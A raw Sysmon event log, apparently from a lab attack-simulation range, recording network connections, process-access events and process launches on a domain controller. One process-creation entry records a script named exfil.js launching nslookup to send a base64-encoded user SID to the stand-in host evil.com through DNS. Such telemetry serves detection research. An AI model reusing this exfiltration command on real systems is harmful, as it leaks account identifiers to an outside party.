354300x8000000000000000204260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.424{00000000-0000-0000-0000-000000000000}5736<unknown process>-udpfalsefalse127.0.0.1-53079-false127.0.0.1-53domain 354300x8000000000000000204259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.424{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53079- 354300x8000000000000000204258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.424{00000000-0000-0000-0000-000000000000}5736<unknown process>-udptruefalse127.0.0.1-53079-false127.0.0.1-53domain 354300x8000000000000000204257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.423{00000000-0000-0000-0000-000000000000}5736<unknown process>-udpfalsefalse127.0.0.1-53078-false127.0.0.1-53domain 354300x8000000000000000204256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.423{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53078- 354300x8000000000000000204255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.423{00000000-0000-0000-0000-000000000000}5736<unknown process>-udptruefalse127.0.0.1-53078-false127.0.0.1-53domain 354300x8000000000000000204254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.423{00000000-0000-0000-0000-000000000000}5736<unknown process>-udpfalsefalse127.0.0.1-53077-false127.0.0.1-53domain 354300x8000000000000000204253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.422{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53077- 10341000x8000000000000000204252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.563{2E1864BB-17CD-629A-FE41-000000005F02}26166424C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-FD41-000000005F02}5956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.422{00000000-0000-0000-0000-000000000000}5736<unknown process>-udptruefalse127.0.0.1-53077-false127.0.0.1-53domain 354300x8000000000000000204250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.317{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53076- 354300x8000000000000000204249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.316{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53075- 354300x8000000000000000204248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.316{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53074- 354300x8000000000000000204247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.234{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53073- 354300x8000000000000000204246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.233{00000000-0000-0000-0000-000000000000}7200<unknown process>-udptruefalse127.0.0.1-53073-false127.0.0.1-53domain 354300x8000000000000000204245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.133{00000000-0000-0000-0000-000000000000}5928<unknown process>-udpfalsefalse127.0.0.1-53072-false127.0.0.1-53domain 354300x8000000000000000204244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.133{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53072- 354300x8000000000000000204243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.133{00000000-0000-0000-0000-000000000000}5928<unknown process>-udptruefalse127.0.0.1-53072-false127.0.0.1-53domain 354300x8000000000000000204242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.133{00000000-0000-0000-0000-000000000000}5928<unknown process>-udpfalsefalse127.0.0.1-53071-false127.0.0.1-53domain 354300x8000000000000000204241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.133{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53071- 354300x8000000000000000204240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.133{00000000-0000-0000-0000-000000000000}5928<unknown process>-udptruefalse127.0.0.1-53071-false127.0.0.1-53domain 354300x8000000000000000204239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.133{00000000-0000-0000-0000-000000000000}5928<unknown process>-udpfalsefalse127.0.0.1-53070-false127.0.0.1-53domain 354300x8000000000000000204238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.133{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53070- 354300x8000000000000000204237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.133{00000000-0000-0000-0000-000000000000}5928<unknown process>-udptruefalse127.0.0.1-53070-false127.0.0.1-53domain 354300x8000000000000000204236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.045{00000000-0000-0000-0000-000000000000}1696<unknown process>-udpfalsefalse127.0.0.1-53069-false127.0.0.1-53domain 354300x8000000000000000204235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.045{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53069- 354300x8000000000000000204234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.045{00000000-0000-0000-0000-000000000000}1696<unknown process>-udptruefalse127.0.0.1-53069-false127.0.0.1-53domain 354300x8000000000000000204233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.045{00000000-0000-0000-0000-000000000000}1696<unknown process>-udpfalsefalse127.0.0.1-53068-false127.0.0.1-53domain 354300x8000000000000000204232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.044{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53068- 354300x8000000000000000204231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.044{00000000-0000-0000-0000-000000000000}1696<unknown process>-udptruefalse127.0.0.1-53068-false127.0.0.1-53domain 354300x8000000000000000204230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.043{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53067- 354300x8000000000000000204229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.043{00000000-0000-0000-0000-000000000000}1696<unknown process>-udptruefalse127.0.0.1-53067-false127.0.0.1-53domain 354300x8000000000000000204228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.968{00000000-0000-0000-0000-000000000000}7336<unknown process>-udpfalsefalse127.0.0.1-53066-false127.0.0.1-53domain 354300x8000000000000000204227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.968{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53066- 354300x8000000000000000204226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.968{00000000-0000-0000-0000-000000000000}7336<unknown process>-udptruefalse127.0.0.1-53066-false127.0.0.1-53domain 354300x8000000000000000204225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.968{00000000-0000-0000-0000-000000000000}7336<unknown process>-udpfalsefalse127.0.0.1-53065-false127.0.0.1-53domain 10341000x8000000000000000204224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.541{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-FE41-000000005F02}2616C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000204223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.968{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53065- 354300x8000000000000000204222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.968{00000000-0000-0000-0000-000000000000}7336<unknown process>-udptruefalse127.0.0.1-53065-false127.0.0.1-53domain 354300x8000000000000000204221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.967{00000000-0000-0000-0000-000000000000}7336<unknown process>-udpfalsefalse127.0.0.1-53064-false127.0.0.1-53domain 354300x8000000000000000204220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.967{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53064- 354300x8000000000000000204219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.967{00000000-0000-0000-0000-000000000000}7336<unknown process>-udptruefalse127.0.0.1-53064-false127.0.0.1-53domain 354300x8000000000000000204218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.865{00000000-0000-0000-0000-000000000000}5480<unknown process>-udpfalsefalse127.0.0.1-53063-false127.0.0.1-53domain 354300x8000000000000000204217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.864{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53063- 354300x8000000000000000204216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.864{00000000-0000-0000-0000-000000000000}5480<unknown process>-udptruefalse127.0.0.1-53063-false127.0.0.1-53domain 354300x8000000000000000204215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.864{00000000-0000-0000-0000-000000000000}5480<unknown process>-udpfalsefalse127.0.0.1-53062-false127.0.0.1-53domain 354300x8000000000000000204214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.864{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53062- 354300x8000000000000000204213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.864{00000000-0000-0000-0000-000000000000}5480<unknown process>-udptruefalse127.0.0.1-53062-false127.0.0.1-53domain 354300x8000000000000000204212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.864{00000000-0000-0000-0000-000000000000}5480<unknown process>-udpfalsefalse127.0.0.1-53061-false127.0.0.1-53domain 10341000x8000000000000000204211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.526{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.863{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53061- 354300x8000000000000000204209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.863{00000000-0000-0000-0000-000000000000}5480<unknown process>-udptruefalse127.0.0.1-53061-false127.0.0.1-53domain 10341000x8000000000000000204208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.526{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.824{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56355-false10.0.1.12-8089- 10341000x8000000000000000204206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.526{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.526{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.526{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-FD41-000000005F02}5956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000204203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.580{00000000-0000-0000-0000-000000000000}3396<unknown process>-udpfalsefalse127.0.0.1-53056-false127.0.0.1-53domain 10341000x8000000000000000204202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.526{2E1864BB-17A1-629A-783D-000000005F02}55523504C:\Windows\System32\WScript.exe{2E1864BB-17CD-629A-FD41-000000005F02}5956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.579{00000000-0000-0000-0000-000000000000}3396<unknown process>-udptruefalse127.0.0.1-53055-false127.0.0.1-53domain 154100x8000000000000000204200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.536{2E1864BB-17CD-629A-FD41-000000005F02}5956C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlppt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.526{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsocqvn.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.479{2E1864BB-17CD-629A-FB41-000000005F02}12165976C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-FC41-000000005F02}5332C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.479{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.463{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.463{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.463{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 